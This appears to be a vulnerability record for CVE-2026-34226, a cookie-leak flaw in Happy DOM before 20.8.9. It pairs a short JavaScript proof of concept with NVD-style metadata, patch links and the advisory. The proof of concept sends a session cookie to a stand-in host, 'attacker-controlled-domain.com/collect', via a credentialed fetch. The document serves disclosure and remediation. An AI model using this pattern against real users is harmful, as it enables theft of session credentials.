CVE-2026-34226

// This PoC demonstrates the cookie leakage in Happy DOM < 20.8.9 // It sets a cookie for the current origin and then makes a fetch request // to an external origin with credentials: 'include'. const { Window } = require('happy-dom'); const window = new Window(); // 1. Simulate the current environment (Origin A) having a sensitive cookie window.document.cookie = 'session_id=super_secret_token; Path=/'; console.log('Cookie on current origin:', window.document.cookie); // 2. Mock the fetch function to intercept the request headers // In a real attack scenario, this request goes to an attacker-controlled server (Origin B) const originalFetch = window.fetch; window.fetch = async (url, options) => { console.log(`[PoC] Sending request to: ${url}`); // In the vulnerable version, headers might contain cookies from window.location // even if 'url' is a different origin. return originalFetch(url, options); }; // 3. Trigger the vulnerable behavior // The Happy DOM bug causes cookies from Origin A to be sent to Origin B window.fetch('http://attacker-controlled-domain.com/collect', { method: 'GET', credentials: 'include' }).then(response => { console.log('Request completed. Cookie potentially leaked to external domain.'); }).catch(err => { console.error('Request failed:', err); });

{"cve": {"id": "CVE-2026-34226", "sourceIdentifier": "[email protected]", "published": "2026-03-27T22:16:23.113", "lastModified": "2026-04-01T13:26:49.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Versions prior to 20.8.9 may attach cookies from the current page origin (`window.location`) instead of the request target URL when `fetch(..., { credentials: \"include\" })` is used. This can leak cookies from origin A to destination B. Version 20.8.9 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}, {"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:capricorn86:happy_dom:*:*:*:*:*:nodejs:*:*", "versionEndExcluding": "20.8.9", "matchCriteriaId": "F247E3AB-3479-46B8-8FAE-703193780558"}]}]}], "references": [{"url": "https://github.com/capricorn86/happy-dom/blob/f8d8cad41e9722fab9eefb9dfb3cca696462e908/packages/happy-dom/src/fetch/utilities/FetchRequestHeaderUtility.ts", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/capricorn86/happy-dom/commit/68324c21d7b98f53f7bb5a7b3e185bda7106e751", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/capricorn86/happy-dom/pull/2117", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/capricorn86/happy-dom/releases/tag/v20.8.9", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-w4gp-fjgq-3q4g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}